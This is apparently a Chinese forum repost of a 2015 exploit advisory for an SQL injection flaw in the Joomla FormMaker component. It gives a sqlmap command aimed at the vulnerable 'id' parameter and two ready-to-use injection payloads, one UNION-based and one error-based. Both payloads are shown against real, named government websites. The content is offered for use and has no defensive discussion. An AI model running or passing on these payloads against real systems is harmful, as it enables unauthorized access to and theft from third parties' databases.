使用说明:
[AppleScript] 纯文本查看 复制代码 python sqlmap.py -u "http://localhost/index.php?option=com_formmaker&view=formmaker&id=-5653&Itemid=45" --dbs
[Python] 纯文本查看 复制代码 ######################################################################
# Exploit Title: Joomla FormMaker Component - SQL Injection Vulnerability
# Google Dork: Y0ur Brain
# Date: 28.03.2015
# Exploit Author: CrashBandicot (@DosPerl)
# Vendor HomePage: [url]http://extensions.joomla.org/extension/form-maker[/url]
# Tested on: Windows
######################################################################
# Exploit : index.php?option=com_formmaker&view=formmaker&id=-5653 {SQLi}&Itemid=45
# index.php?option=com_formmaker&task=paypal_info&tmpl=component&id=-1 {SQLi}
# ~ Demo ~ # $>
# Example :
# Type: MySQL UNION query (NULL) - with 28 columns
# URI: [url]http://www.cabinet.gov.zm/index.php?option=com_formmaker&view=formmaker&id=-5653[/url] UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170707671,IFNULL(CAST(database() AS CHAR),0x20),0x71767a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&Itemid=45
# Other Example :
# Type: error-based
# URI: [url]http://www.ppsppa.gov.my/index.php/ms/?option=com_formmaker&view=formmaker&id=1[/url] AND (SELECT 4784 FROM(SELECT COUNT(*),CONCAT(0x7170767671,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x71706b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Itemid=837
# sh00t5 To SQL_master :D
| 
发表于 2015-3-29 18:02:33
发表于 2015-3-30 13:18:58
